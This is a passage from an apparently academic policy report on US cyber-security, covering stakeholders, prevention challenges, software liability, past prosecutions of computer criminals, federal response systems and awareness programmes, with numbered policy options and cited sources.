civilian sector, and is therefore vulnerable to any threat to which civilian networks could be

vulnerable. Military and civilian networks must work together to come up with a defense system

that will be suitable to both parties without infringing on the civil rights granted by the

Constitution.206

6.4 Stakeholders

American citizens are the primary stakeholders in regards to cyber-attacks against the US. Other

stakeholders are the US government, state and local governments, other nations and their

citizens, private companies, health and medical institutions, financial institutions, and various

departments within the US government (such as the Department of Justice). In an analysis of the

dependency of the Internet, it is difficult to determine what well-established country would not

be affected if cyber-attacks were to become more prevalent. It appears as though the more

dependent a nation becomes on the Internet, the more secure its government is required to be in

order to ensure it will not be affected by cyber-attacks. Similarly, citizens and private companies

can be negatively affected if their networks are exploited. Electronic medical records are at

stake, as well as the financial status of citizens and companies. The Federal Government has

made a special note of particular stakeholders, as seen in the figure below. These stakeholders

include the home user and small business, large enterprise, critical infrastructures and sectors,

national implications, and global.

204

http://www.wired.com/politics/law/news/2000/07/37503 205

http://abcnews.go.com/Technology/Story?id=3771510&page=1 206

http://www.nitrd.gov/pitac/reports/20050301_cybersecurity/cybersecurity.pdf

89

Figure 6.1 Roles and Responsibilities in Securing Cyberspace from NSSC

Home User and Small Business – stakeholders in this category rarely

communicate incidents, according to US-CERT. However, many of the cyber-

attacks discovered develop through the use of their systems. Home and small

business users are prevalent stakeholders in securing cyber-space

Large Enterprise – Bigger companies are stakeholders in relation to cyber-

attacks because of their dependency on network systems. Many of their records

and critical documentation are electronically stored and accessed on their

networks and destruction or damage would adversely affect their business and

profits.

Critical Infrastructure and Sectors – Critical infrastructures can be physically

affected by a cyber attack. These sectors are increasingly becoming dependent on

software and network systems and are thus vulnerable to cyber-attacks.

National Implications – The US government is a primary stakeholder in cyber-

attacks. If damage or information theft were to occur to federal systems, chaos

and lack of control could ensue and threaten national security.

Global – International stakeholders are affected by cyber-attacks because of the

range of damage these attacks can span. The Internet and networks cross the

90

globe, so an attack in a geographically different area could still result in damage

in another location.

6.5 Prevention

Many cyber protection and warning systems are currently available from both private and

government organizations. Most major software publishers also employ personnel who

specialize in security issues and work to correct their software quickly once vulnerabilities are

revealed. In organizations with critical networks, there are often professionals in place who are

responsible for protecting the systems from cyber-attack. The software market is aware of the

need for cyber security and has responded by providing a wide variety of services which attempt

to satisfy the need for defense. The government currently has agencies in place which receive

reports on cyber incidents, researches them, observes trends, and publishes appropriate warnings.

While a wide variety of warnings, products and services exist for the purpose of preventing cyber

damage, major issues remain which leave systems open to attack.

6.5.1 Prevention Challenges

While it is impossible to prevent all cyber-attacks and make computer systems completely

invulnerable, there are many changes in behavior that could greatly reduce vulnerabilities. Any

policies created to address issues in preventing cyber-damage should take these problems into

consideration.

● Security in cyber-space is a never ending arms race between attackers and security

professionals, it is incorrect to assume that one can simply buy a product and be secure.

Despite the promises some of these products tend to make, attackers work constantly to

circumvent these products. Preventing cyber damage requires more attention than buying

a product and ignoring it.

● Warnings of newly found security vulnerabilities and software updates designed to address

new problems are common, but many administrators neglect to heed these warnings and

update their systems. Critical systems can sometimes be found with software that is years

behind current security standards, due to the difficulty in updating software and

ignorance of the people maintaining the systems.

● Companies which experience attacks and publishers of software containing security

vulnerabilities often fail to provide information which can be used to prevent further

damage, because of fears that admitting to security failures will damage their reputations.

Requiring software makers to disclose defects to potential customers would improve

security but could also harm business.

● Warnings of vulnerabilities and published material about securing computers present

solutions as well as new problems. Attackers can use this knowledge to develop their

skills in attacking just as easily as administrators can use the information to improve their

91

defenses. Sometimes the warnings inspire attackers to take advantage of newly published

vulnerabilities faster than the same warnings can be addressed by system administrators.

● The attackers themselves who are constantly developing new cyber-attack strategies have

security information resources of their own, many of which can be viewed by security

personnel and used to anticipate their attacks.

● Releasing information relating to security requires good judgment in order to prevent

problems; this “security through obscurity” issue is one of the most debated points in the

cyber-security community.

● Experts in computer security have conflicting opinions on the best ways protect systems;

any mandates relating to system security will need to include flexibility to allow for the

different approaches used by different system protectors.

6.5.2 Prevention Products

There are a wide variety of tools on the market that are sold for the purpose of securing

computers, though these products are not available for every vulnerable platform, especially the

proprietary systems which were not reliant on computers in the past. As products are developed,

new exploits are also made which present new kinds of threats. The previous examples (see

2.3.2) about Distributed Denial of Service attacks and Rootkits are relatively new attacks. Before

1999, the old style of DoS attack from a single attacking system was addressed by firewalls and

largely prevented, which led to the development of new methods of attack. Programs employing

stealth techniques meant to evade detection and removal by security products like virus scanners

have become much more prevalent in recent years. The anti-virus company McAfee reports the

following trend in new software which attempts to avoid detection:

92

Figure 6.2

207

While attacks are becoming more sophisticated, products designed to prevent them are also

adapting, employing the appropriate products is definitely helpful in improving security, but

system administrators must be careful not to rely on those products too much. Firewalls,

Intrusion Detection Systems, system logging tools, virus scanners, and automated software

updates are some of the types of products available to assist in securing computers, but cannot

completely prevent attacks without people in place to protect critical systems. The amount of

solutions available can be overwhelming, and many products make false promises. Currently the

only method of confirming that a security company actually increases security and has products

that do what they promise is the market and the media. One step that can be taken to prevent

cyber-attack is an institution in place that independently confirms if a software product actually

delivers the security that it promises, perhaps in a similar way to the FDA’s process of

confirming that drugs actually do what their sellers promise, though this also raises concerns

about the impact on the fragile software industry.

6.5.3 Security Personnel

Many professionals are employed to protect computer networks, and have varying degrees of

success doing so. One of the more popular excuses for the failure of system protection is under-

trained administrators. The cyber-attack situation is unique in that every networked device is a

potential target, and that security professionals are needed in more places than they were in the

past. Businesses are rapidly realizing that cyber-security is part of the cost of doing business

today, often after suffering from an attack that their IT department was not prepared to prevent.

207

Rootkits: The Growing Threat. 2006 McAfee Inc. 1 Nov 2007. <http://download.nai.com/products/mcafee-

avert/WhitePapers/AKapoor_Rootkits1.pdf>

93

Many private certifications exist that confirm an employee is trained in cyber-security,

unfortunately cyber-security is an ever-changing field and requires constant study to remain

prepared. A system of licensure for cyber-security professionals would help to ensure that

competent personnel are selected to defend critical systems. Further, a standard could be defined

that clarifies which systems need such professionals to protect them. Addressing the issue of

ignorant security personnel is complex, because administrators are in a constant race against

hackers to learn about vulnerabilities and defense strategies, and many organizations now relying

on computer networks are not aware that they need trained employees to defend them.

6.5.4 New Vulnerabilities

Products and personnel who work to protect their systems can help to prevent cyber attacks, but

another important area to address in potential policy is how software reaches the public with

flawed security in the first place. Software developers bear a great responsibility in distributing

products which do not leave their customers vulnerable to cyber attack. Much speculation exists

for the reasons that so many flaws exist in current software.

6.5.5 Computer Security and Liability

There are active debates on how liable producers of software should be for vulnerabilities

introduced into systems by their products. Most products which contain these security flaws are

distributed with “End User License Agreements” which take effect as a condition of installing

the software. These agreements usually contain language that exempt the software companies

from all responsibility for any attacks that their customers may suffer from through

vulnerabilities in their products. Courts have repeatedly upheld these agreements, to the point

that holding software authors liable for security flaws in their products would require changes to

the law.

Despite this lack of liability for vulnerabilities in their products, software companies still have

incentive for making secure programs. The damage to a company’s reputation after enabling a

new kind of attack on its customers can cost a business a lot of money. In this way, while they

are not legally liable, they remain morally liable and continually work to improve their security,

though perhaps not as well as they would if vulnerabilities in their products were a greater risk

for them financially. The debate surrounding software liability also raises concerns about

increased software costs and the extra difficulty involved in identifying vulnerabilities in

software compared to defects in physical products.

6.5.6 Policy Options

Taking these challenges into consideration, there are several possibilities for policy changes that

could help to prevent successful cyber-attacks, which can be applied to individuals, security

professionals, and the designers of networks. Each potential policy would require careful

wording and sensitivity to the needs of businesses and the rights of individuals as well as the

technical consequences.

94

Policy Option 6.5.1: Require by law that all computers be secured in specific ways.

A policy that demands all systems be secured is a tempting idea, but carries with it

many consequences. Explicitly defining which precautions to make about cyber-

security increases government encroachment on individuals and if worded improperly

could actually make computers less secure. Diversity is an important part of system

protection, which a law explicitly demanding specific security precautions might

eliminate, and actually giving attackers more potential targets. A law requiring

security precautions would need to be worded in abstract terms to allow for the

diverse systems which currently exist. Specific security measures required by law

might raise the cost of computers and reduce the performance of the technology.

Defining a bare minimum of precautions that must be taken might lead to fewer

systems protecting themselves beyond that minimum. It may be possible to create a

law which requires certain precautions with minimal negative side effects that could

reduce vulnerability, but such a law would have to be created very carefully.

Policy Option 6.5.2: Change the policies about liability for software makers and/or

system administrators.

A policy might be drafted which could hold system administrators responsible for

damage caused by their systems. The law would give administrators a larger

motivation to secure their systems so that attackers could not commandeer them and

execute attacks. In a way, administrators are already responsible for their systems,

because security breaches under their watches tend to hurt their careers, so the

necessity of this policy is debatable. Changes in liability rules would increase the

stress put on those with increased responsibility, possibly raise the cost of their

service and reduce the number of people willing to take the risk of working to protect

networks. In some limited systems, changes in liability rules might be more

appropriate than others. For example, administrators responsible for maintaining

networks controlling critical infrastructures or connected to extremely high-capacity

Internet links might deserve more legal motivation to secure their systems than

owners of personal computers.

Applying new responsibility to software developers would slow down the

development process and increase the cost. Software prices would rise to offset the

legal costs relating to new liabilities, while programmers would be under legal

pressure to secure their products, possibly at the expense of performance. The private

sector already has motivation to secure its products, but perhaps is not as concerned

as it should be that flaws in one system can be used to cause damage to the systems of

others. Certain violations of software security might be more appropriate to hold

developers responsible for than others; it may be possible to make adjustments in

liability rules which improve security with minimal impact on the cost and

performance of software. Imported software and outsourced developers would also

have to be taken into consideration in any policy about the liability of software

developers.

95

Policy Option 6.5.3: Create programs to approve security products and personnel.

Institutions exist for the licensure of many different professionals and the approval of

different products which might be similarly created to address cyber-attack

possibilities. Policy makers can expect debates over whether government or the

private sector can better provide cyber-security approval services. Having a

compulsory form of certification may be helpful, since current methods of approving

software and personnel for security still allow for false products and charlatan

professionals to exist. A government approval process for allowing individuals to

practice securing systems would have to be carefully crafted by experts to insure that

certified individuals are qualified for their positions. Creating new institutions would

be costly, and defining the specific software packages and personnel under their

jurisdiction would be difficult, but having more qualified security personnel and

higher quality defense products would be helpful.

Additionally, infrastructure has significant holes in prevention measures.

Policy Option 6.5.4: Federally demand a minimum level of security for critical

infrastructure systems.

In 2001, the Energy Information Security program was created in an attempt to

develop better defense technologies for our nation's critical infrastructures. Due to

the difficulty of and the time needed for installing these technologies, many

companies have not kept their systems up to date. Because they are not properly

secured, it leaves even the "secured" infrastructure companies vulnerable to attack

simply due to them being connected to the same network as the unprotected

companies. Therefore, the minimum level of security for our nation's infrastructure

must be federally regulated so that the United States' power utilities, water lines,

communication systems, and emergency response will not fail due to a "weak link" in

their network connections.

6.6 Response

6.6.1 Judicial Response to Past Attacks

One of the main difficulties in prosecuting cyber attackers is that they are difficult to capture and

apprehend. Taking legal action against these criminals is not as common in the federal and state

governments, therefore many of the established fines and lengths of imprisonment are subjective.

A few examples of past sentencing on individuals show how the extensive differences in damage

and punishment. The only known instances in which the fine charged to the criminal and the

cost of the damage caused were the same were in incidents regarding disgruntled employees and

the company that employed them. The case information represented below was found at the

Department of Justice’s website for Computer Crime Cases.208

208

"Computer Crime Cases." Computer Crime and Intellectual Property Section. US Department of Justice.

<http://www.usdoj.gov/criminal/cybercrime/cccases.html>.

96

6.6.1.1 Russian Man Sentenced for Hacking into Computers in the United States

Russian citizen Alexey Ivanov pleaded guilty to several charges of conspiracy, hacking,

computer fraud, credit card and wire fraud, and extortion. From Russia, Ivanov and others

hacked into dozens of United States computers. After extracting important data such as

passwords and credit card information, Ivanov and the others then deleted all of the original data

and destroyed the computer systems. The estimated cost of damage was approximately $25

million. Ivanov was sentenced, at the age of twenty-three, to four years in prison and three years

of supervised release. US Attorney Kevin O’Conner played a major part in Ivanov’s trial, and he

mentioned how Ivanov’s prosecution “demonstrates the ability and resolve of the Department of

Justice to vigorously investigate and pursue cyber-criminals who attack American computer

systems. We are committed to tracking down and prosecuting those individuals wherever they

may be”.

6.6.1.2 Melissa Virus

Much of the information regarding the legal action placed upon the creator of the Melissa Virus,

David L. Smith of New Jersey, is private and has not been fully disclosed to the public.

However, it is known that the maximum charge that he could be given in the state government is

5 years in prison and a $250,000 fine. In federal court, the cyber-criminal could be facing 10

years in prison and $150,000 fine. Officially, the Melissa Virus caused over $80 million in

damage.

6.6.1.3 Disgruntled Employee

Timothy Allen Lloyd of Delaware has begun serving 41 months in prison and charged with a $2

million for letting loose a “time bomb” that deleted all the production programs used by his

former employer. The cost of damage caused by this cyber attack was over $10 million.

6.6.1.4 Israeli Citizen Arrested in Israel for Hacking Government Computers

Both the United States and Israeli government computers, as well as hundreds of commercial and

educational systems, were hacked into and attacked by Ehud Tenebaum in February of 1998. He

pursued these attacks to extract sensitive data from all systems and damage the attacked

computers. Ehud was sentenced to 12 months probation and a $17,000 fine.

Ehud’s capture was an orchestrated effort by both the United States and Israeli government.

Attorney General Janet Reno said that “the prompt arrest of the Israeli hacker demonstrates the

effectiveness of international cooperation in cases involving transnational criminal conduct”.209

6.6.1.5 Konopka Attacks

Between February 14, 1998 and January 25, 2001 Joseph Konopka of Wisconsin carried out 9

different violations to federal law relating to conspiracy, destruction of energy, air navigation

and telecommunication facilities, arson, trafficking counterfeit goods, and causing damage to a

209

"Israeli Citizen Attacks Government Computers." Computer Crime and Intellectual Property Section. US

Department of Justice. <http://www.usdoj.gov/criminal/cybercrime/cccases.html>.

97

protected computer. It was also predicted that 53 acts attributed to Konopka caused excessive

damage and that more acts were supposed to occur had he not been discovered and prosecuted.

Konopka knowingly caused 28 power outages and other disruptions which affected 30,000

power customers and caused over $800,000 in damages. The maximum sentence he can serve is

5 years in prison with a $250,000 fine.

Clearly, there is a disconnect between the punishment for cyber-crimes and the crimes

themselves. The judicial system is extremely limited in persecuting cyber-criminals, and even

when an attacker is caught, they are soon released and back online.

Policy Option 6.6.1: Create a more forceful and concentrated effort to prosecute

cyber-criminals to the full extent of the damage they caused. It is dangerous to allow

criminals who have caused millions of dollars in damage to be allowed to access

computer systems after only a few years of imprisonment. Additionally, minimum

and maximum sentences need to be increased to reflect the widespread damages

caused by cyber-attacks.

6.6.2 National Cyberspace Response System

The National Cyberspace Response System is the federal government’s current method of

analyzing and responding to cyber-attacks that occur against United States citizens and the

government. Analysis of an attack, warning, incident management, and response and recovery

from an attack are the four primary steps used by the National Cyberspace Response System. It

also includes governmental and nongovernmental information sharing and analysis centers such

as MS-ISACs.

National Cyberspace Response System Structure

Figure 6.3 National Cyberspace Security Response System .

210

210

"Priority I”. National Strategy to Secure Cyberspace. Feb. 2003. US Government.


98

Analysis

The analysis of cyber-attacks is essential for preparing the nation to handle effects

caused by cyber-warfare. Through careful evaluation of incidents, inductive

inferences can be made to warn and organize stakeholders about future attacks. Also,

constant assessment of vulnerabilities can show what area an attacker may be most

likely to damage.

Warning

The National Cyberspace Security Response System finds it critical to communicate

warnings to vital areas that would be affected by a nation-wide cyber-attack. A

bulletin board that not only describes incidents but also suggests unnoticed

vulnerabilities is currently being used as a method of communication by US-CERT.

Incident Management

US-CERT currently has in place a method for reporting and classifying incidents.

Anyone with access to the Internet can review this information and ask to be alerted if

any critical incidents are found.

Response/Recovery

The National Cyberspace Security Response System makes note that the OMB, via

FISMA, requires federal agencies to take responsibility in noticing and recovering

from cyber attacks.211

6.6.3 Public and Private Ways to Communicate

The federal government has taken an initiative to communicate with private sectors, as seen by

the Blue Cascades II and Purple Crescent II projects. These regional exercises took place in

Seattle, WA and New Orleans, LA in order to assess the cyber-readiness of individuals and

businesses. Both Blue Cascades II and Purple Crescent II brought together more than 200

government and private sector officials to analyze response procedures to cyber attacks, and to

emphasize the importance of cyber security in critical infrastructure protection.212

These

exercises also allowed discussion on ways to integrate physical security and cyber security. The

brief success of these exercises suggests that more training programs would benefit private

sectors in their efforts to secure their cyber-space.

211

"Priority I”. National Strategy to Secure Cyberspace. Feb. 2003. US Government.

<http://www.whitehouse.gov/pcipb/policy_and_principles.pdf>. 212

"Fact Sheet: Protecting America’S Critical Infrastructure – Cyber Security." US-CERT. Department of

Homeland Security. <http://www.us-cert.gov/press_room/050215cybersec.html>.

99

6.6.4 Sharing Information

The federal government has taken some initiative for sharing information, as seen by US-CERT.

Inter-agency communication has become standardized and easy flowing.213 Many companies

and private sectors do not feel as though there is an adequate portal to relay information related

to cyber-attacks. In addition, many companies feel as though a publicized vulnerability within

their system may negatively affect the success of their business. Confidentiality, therefore, is a

significant attribute that must be included in securing the nation against cyber-attacks.

Even though exercises have been done to emphasize its importance, it is still difficult to integrate

public and private communication effectively. A reevaluation of the motivations for private

sectors to partake in securing against and responding to cyber-attacks may help clarify why

communication has been unproductive between the government and its citizens. Due to the

variability of cyber-attacks, it is not suggested to incorporate a law that would make it mandatory

for businesses to secure their networks to one specific standard. Because of the constantly

changing methods of cyber-attacks, a law mandating network security may not ensure that

systems are fully protected against all cyber-attacks.

6.6.5 Policy Options

The stakeholders involved in policies regarding the response to cyber-attacks include large

businesses, critical infrastructures, and the US government. Below are several policy options that

have not been fully enacted. While several Federal agencies have been funded to create systems

which respond effectively to cyber-attacks, these agencies are still not established as a reputable

source to place action upon cyber-criminals. It has also been noted how the prosecution of cyber-

criminals is much more powerful against disgruntled employees than against orchestrated efforts

to attack the government’s computers. Response, therefore, must work with policy options from

other divisions such as raising awareness of cyber-incidents and international cooperation.

Policy Option 6.6.2: Apply a more concrete method of analyzing cyber-attacks in

such a way that a general audience is able to comprehend. This will be useful in

enhancing the quality of communication between the government and its citizens.

Policy Option 6.6.3: Allow incentives for private sectors in their own attempts to

secure their networks. Due to the lack of profit directly resulting from securing their

cyber-space, private companies do not see the benefit in taking the initiative to

prevent cyber-attacks on their own system. If the government were to provide

incentives or prominent recognition of companies who successfully work to secure

themselves, private sectors will be more likely to conform to the government’s view

of cyber-security.

Policy Option 6.6.4: Attempt to increase communication not only with home users

and small businesses, but also with other nations. A better response to cyber-attacks

is dependent on increased communication and analysis of attack trends. Opening up

213



100

an international dialogue related to cyber-attacks could prepare the US government

and citizens for possible future attacks.

Policy Option 6.6.5: Establish a network in which local police and firefighters are

able to coordinate effective response systems in regards to local cyber-attacks. For

example, have a hotline for businesses and computer users to have access to in case of

a cyber-attack. The difficulty with this policy is finding a way to communicate in case

telecommunications were disrupted as well. Perhaps the most reliable method is to

create a useful two-way radio between departments that could be accessed by heads

of Information Technology departments at companies as well.

6.7 Policies to Promote Cyber-security Awareness and Training

The awareness and training policy priority described in the NSSC has two components:

increasing all computer users’ awareness of secure computer usage and ensuring that the IT

professionals who design and maintain large computer systems receive cyber-security training.

According to the NSSC, programs to address these two issues should target four stakeholder

areas: home and small business users, large enterprises, critical sectors and infrastructures, and

the nation as a whole.214

While programs have been established to address concerns in each of

these stakeholder areas, their level of success has been mixed.

6.7.1 Policies for Home and Small Business Users

Several government programs are in place to inform home and small business users of the

security risks associated with daily computer use, and how to protect themselves against that

risk.

US-CERT maintains two email bulletins, one to distribute security tips and the other to distribute

security alerts. The security tips inform readers of everyday security practices such as

maintaining privacy on the Internet; while the security alerts “provide timely information about

current security problems” so the reader can protect their “home or small business computer.”215

However, it isn’t clear that any concerted efforts have been made to popularize or advertise these

email bulletins, and no statistics on their subscription numbers were readily available.

The Department of Homeland Security’s National Cyber Security Division organizes an annual

Cyber Security Awareness Month each October, a joint effort with numerous public and private

sector organizations. As part of Cyber Security Awareness Month, the N.C.S.D. sponsors

214

“Priority III.” The National Strategy to Secure Cyberspace. February 2003: 37-41. 23 Oct. 2007


US-CERT, National Cyber Alert System. Retrieved October 25, 2007, from US-CERT Web site: http://www.us-

cert.gov/referral_pg/

101

several conventions, conferences and other events each day.216

Most of the events take place at

universities, and this year’s theme was “Protect Yourself Before You Connect Yourself.”217

Also, the Natl. Cyber Security Alliance has created Stay Safe Online, a website to inform the

general public of how to use computers safely.218

The site is extensive and includes many

articles and exercises, such as a test to determine how safe a computer user is from cyber-attacks

and tips for protecting a small business. The site is divided into sections targeting educators,

families and children, and small businesses. It could be of great use, but it evidently has not

been advertised heavily enough, as its current level of daily traffic places it outside of the one

million most visited websites.219

Policy Option 6.7.1: Increase advertisement funding for the federally-managed

websites and email lists described above. These websites have the potential to

increase public awareness, but are not receiving the traffic needed to make an

impact.220

Advertising them more vigorously would improve their public exposure.

Policy Option 6.7.2: Create greater incentives for small businesses to inform their

employees of cyber-security concerns. For example, small businesses could receive

tax credits if a certain percentage of their employees subscribe to US-CERT’s e-mail

bulletins or undergo an educational training course on cyber-security. Many of the

Stay Safe Online website’s content could be used for such a course.

6.7.2 Policies for Large Enterprises

There are fewer federal programs designed to inform large enterprises. However, one of the

largest sources of vulnerabilities in large enterprises comes from the Internet usage of individual

employees, so some of the programs described above also apply to large enterprises. The US-

CERT cyber-alert email bulletin and Cyber Security Awareness Month are two such programs.

Some companies sponsor Cyber Security Awareness Month programs to educate their

employees, and in 2007 the month’s schedule included several events related to enterprise-level

security, such as one forum on “Best Practices for Managing IT Security and Compliance”.221

Recent polling data is mixed on whether enterprises are aware of the risk created by poor cyber-

security. One IBM study from 2006 showed that 75 percent of corporate IT managers are wary

216

National Cyber-Security Alliance (2007): National Cyber Security Awareness Month 2007 Calendar of Events.

Retrieved October 30, 2007, from Stay Safe Online. Web site: http://www.staysafeonline.org/events/index.html 217

US-CERT, (2007). October is National Cyber Security Awareness Month. Retrieved November 3, 2007, from

US-CERT Web site: http://www.us-cert.gov/press_room/ncsamonth.html 218

National Cyber Security Alliance: Stay Safe Online. Retrieved October 31, 2007, from Stay Safe Online Web

site: http://www.staysafeonline.org/ 219

Traffic details for staysafeonline.info. Retrieved November 3, 2007, from Alexa: The Web Information

Company. Web site: http://alexa.com/data/details/traffic_details?url=staysafeonline.info 220

Ibid 221

National Cyber-Security Alliance (2007): National Cyber Security Awareness Month 2007 Calendar of Events.

Retrieved October 30, 2007, from Stay Safe Online. Web site: http://www.staysafeonline.org/events/index.html

102

of the risk of cyber-attacks from within the company.222

On the other hand, a 2004 USA Today

poll indicated that 40 percent of companies were not notifying anyone after a cyber-attack

occurred, which indicates a lack of attention to the most basic security procedures.223

This

suggests enterprise-level awareness is an area where more federal resources are needed, because

many corporate IT managers still do not fully consider the importance of cyber-security.

The priority of training IT professionals is a larger issue for enterprises than for small businesses.

Many small businesses have relatively simple computer networks, and are able to rely on

established, industry-standard software and network technologies. Other small businesses

choose to periodically call on technology consulting services to meet their IT needs. Large

enterprises, on the other hand, are more likely to create their own proprietary software systems

and vast, complex internal computer networks. For this reason, large enterprises are more likely

to have their own in-house dedicated IT departments. Policies to encourage cyber-security

training of these IT professionals are lacking and must be developed.

Policy Option 6.7.3: Provide tax incentives for enterprises whose employees undergo

an educational cyber-security course. As in the case of small businesses, this could

be an effective way to increase awareness of secure computing practices among

individual workers.

Policy Option 6.7.4: Work with private industry to create a standardized set of

essential skills for IT professionals in the area of cyber-security, for the purpose of

creating a certification program. If such a standard were created, the IT professionals

responsible for designing and maintaining companies’ internal computer systems

could be trained to meet the program’s requirements and could take a test to become

certified.

6.7.3 Policies for Critical Sectors and Infrastructures

Governmental attempts to increase cyber-security awareness and training within the private

sector entities involved in critical infrastructure sectors have been insufficient. As described

previously, the federal government has enacted mandatory completion of electronic shipping

manifests in some modes of transportation (trucking), and has advertised optional submission of

electronic manifests in others (shipping by water and train). However, the focus has been on

increasing participation, and no attempt has been made to ensure that participating companies are

aware of the added cyber-security risk.

As certain critical infrastructures have been increasingly privatized, some private corporations

have formed alliances to increase training in security issues. One example is Cisco’s Critical

Infrastructure Assurance Group, which trains teams of technical experts who can then assess the

222

Messmer, Ellen (2006, March 14). IBM survey on cybercrime shows IT managers wary. Retrieved November 1,

2007, from Network World. Web site: http://www.networkworld.com/news/2006/031406-ibm-survey-

cybercrime.html 223

Gagnon, B. (2004). Are We Headed For a Cyber-09/11? The American Failure in Cyberstrategy. Conference

Papers -- International Studies Association, Retrieved October 24, 2007, from Academic Search Premier database.

103

security of various infrastructure-related corporations.224

However, the free markets alone may

not be enough to promote these efforts; the CIAG recently announced it would scale back future

research efforts and growth.225

Policy Option 6.7.5: Accompany existing efforts to encourage electronic submission

of shipping manifests with efforts to encourage safe and secure handling of the

electronic manifest data. An additional option to consider is an incentive program for

companies that implement and document measures taken to secure electronic

shipment manifests and shipment tracking systems.

Policy Option 6.7.6: Make available and widely publicize a national database of

cyber-incidents and attempted cyber-attacks at critical infrastructure components such

as transportation, power, and communication systems. By increasing the public’s

attention to these areas, such a database could add pressure on infrastructure

companies to focus more on their own cyber-security prevention and response.

6.7.4 Policies for the Nation as a Whole

The previously mentioned public awareness policies target specific areas of concern for cyber-

security awareness and training, but there a few other programs designed to increase awareness

across all sectors of the nation. One example is the National Telecommunications and

Information Administration. One organization within the NTIA, the Critical Infrastructure

Protection, has a stated objective to “assist policy makers, industry, and consumers to become

more educated about how to manage risks and protect cyberspace”.226

Policy Option 6.7.7: Increase funding for university-level research of cyber-security

and preparedness measures, and provide funding for universities and community

colleges to create dedicated cyber-security training and research programs. This

could significantly improve the training of America’s future IT workforce.

Policy Option 6.7.8: Create a cyber-warfare threat level indicator system, possibly

similar to the Department of Homeland Security’s color-coded daily threat level

indicator. This sort of indicator system could be used by media outlets to help

publicize the issue of cyber-security, and would increase overall awareness of the

issue across all sectors.

224

Critical Infrastructure Assurance Group Online. Retrieved November 1, 2007, from Security@Cisco Web site:

http://www.cisco.com/web/about/security/security_services/ciag/index.html 225

Heise Security (2007, October 11). Report: Cisco closes down Critical Infrastructure Assurance security research

group. Retrieved November 3, 2007, from Heise Security Web site: http://www.heise-security.co.uk/news/97205 226

NTIA: Critical Infrastructure Protection. Retrieved November 3, 2007, from NTIA Web site:

http://www.ntia.doc.gov/ntiahome/infrastructure

104

6.8 Government Cyber-security

In addition to working nationally to secure cyberspace, the government must take the lead in

securing their own networks. The federal government is responsible for a variety of critical

institutions including the military, taxes and social services, emergency services, and financial

and banking institutions. As a keeper of the public trust, it is required that the government

ensures that all of its internal systems are secured from cyber-attack, and lead the nation by

example. The efforts of the federal government to secure itself from cyber-warfare can then be

translated to state and local governments, as well as a model for private efforts. Through recent

reforms, the government has adopted a uniform policy on securing cyberspace, which is largely

thorough except for a few areas.

6.8.1 Federal Level Security

In 2002, the OMB released an assessment of the relative strengths and vulnerabilities of the

security of individual systems in the government. It identified six areas needing improvement:

lack of senior management attention, lack of performance monitoring, poor security education

and awareness, failure to integrate into capital investment planning, lack of contractor oversight,

and failure to detect and report vulnerabilities.227

Unfortunately, these deficiencies had been

identified as weaknesses for the previous six years (1996-2002) with no policy for improvement.

In order to resolve these weaknesses, the OMB established federal guidelines for the oversight of

individual agencies. Using a defined minimum level of security, the OMB is now able to ensure

that any future IT systems have been analyzed and patched for any security weaknesses as well

as track progress in fixing existing vulnerabilities. This allows for a government wide IT

standard previously missing.228

The current administration has sought to remedy security weaknesses primarily through funding

restrictions. Before systems can be funded by the Office of Management and Budget (OMB),

the department must show that any IT weaknesses have been addressed within the system. As a

result, security is a top priority for any system upgrades or investments, and a baseline of

security is achieved.229

Additionally, the lifecycle costs for security are required to be identified

and integrated as part of submitted budgets. Failure to having the costs integrated or identified

weaknesses remedied results in a complete rejection of the entire system upgrade.

Additional areas of concern include government wireless networks and user authentication.

Wireless networks are of special concern, as they are often easy to breach and often unsecured.

Data transferred wirelessly can be intercepted, presenting the risk of data theft. Agencies must

ensure that their networks are secured, check for any unauthorized access, and report any

227

“Priority IV.” The National Strategy to Secure Cyberspace. February 2003. 30 Oct. 2007


Ibid. 229

Ibid.

105

security breaches.230

User authentication also presents a security threat, although relatively easy

to counteract.

Policy Option 6.8.1: Mandate user password complexity and frequent changes, log-

outs after a short time of inactivity, and require secondary identification (in the form

of ID cards required to run the computer).

6.8.2 Agency Level Security

Although the OMB has established a baseline for monitoring and grading IT threats and

vulnerabilities across the government, it is vital to have a process for each agency to reach the

desired level of security. Agencies must document and define their system structure,

continuously assess threats and vulnerabilities, and enact security controls and install any

security patches.

The first step, identifying and documenting the system structure, primarily assesses the security

of each agency. Included is the current status of all parts of the system and their security level,

as well as any interaction amongst other agencies in the government. This inventory and

assessment of system processes as a whole offers a view of the current state of government

security. The agencies will then receive funding to remedy any weaknesses as well as bring the

entire government system up to a baseline level. Additionally, updated systems can allow IT

personnel to easily modify and secure computers agency wide.231

Secondly, each agency must stay aware of any new threats or vulnerabilities in their systems.

Through auditing systems, each agency will monitor computer usage and determine the

effectiveness of control mechanisms, such as restricted website access. Additionally, the control

mechanism will allow the agency to update the security of their system as threats are identified

by the federal government. Through measuring effectiveness of the security systems as well as

centralized control over updates and patches, agencies can work to meet government wide

standards for security.

Finally, the agencies must implement the results of any findings they might have. Security

patches must be installed, as many viruses work through known flaws in programming that often

have available solutions. Through control systems, risk can be widely mitigated, and with

constant assessment of existing programs as well as future programs, vulnerabilities can be

remedied.

Policy Option 6.8.2: IT departments should be required to submit system structure

documents, detailing the systems used throughout their agency. Departments should

institute a government wide internet control program to restrict potentially threatening

website access. Additionally, they must show prompt response and 100%

implementation of security patches for their systems.

230

Ibid. 231

Ibid.

106

Following the discussion of the vulnerabilities in the FAA, there is a pair of policy options

specific to the FAA, but could form a model for other governmental agencies.

Policy Option 6.8.3: Mandate that the future development of the FAA's air traffic

control system continue to favor decentralized, redundant regional control centers.

This will ensure that it remains impractical for a cyber-attack to disable the air traffic

system on a nationwide level. One possibility is to make backup computer systems

run in parallel with the main systems, but with a different implementation (e.g. a

different hardware configuration or operating system), so a vulnerability exploited on

the main system may not affect the backup.

Policy Option 6.8.4: Require that the FAA (or other government agencies) limit

outside IT contractors' access to the computer systems they are directly involved with.

As discussed previously in Section 3.4.3.2, contractors are currently given full access

to systems that are not relevant to their work assignments. This simple measure

would limit the risk of an outside contractor inserting malicious code into the

agency's computer systems, and remove one vulnerability from the air traffic control

system.

6.8.3 Areas for Improvement

Although the preceding sections of government policy are adequate to address security issues,

there are two main areas in need of improvement. First is the oversight and security of

contractors, an issue identified by the OMB. Secondly is the lack of a uniform testing procedure.

Many skeptics of cyber-warfare suggest that the knowledge needed to penetrate systems and

wreak havoc is so advanced that only those inside of an agency could perpetrate an attack.

However, these skeptics fail to realize that a significant portion of cyber-attacks come from

within an organization. Due to the nature of the government and costs of labor, large chunks of

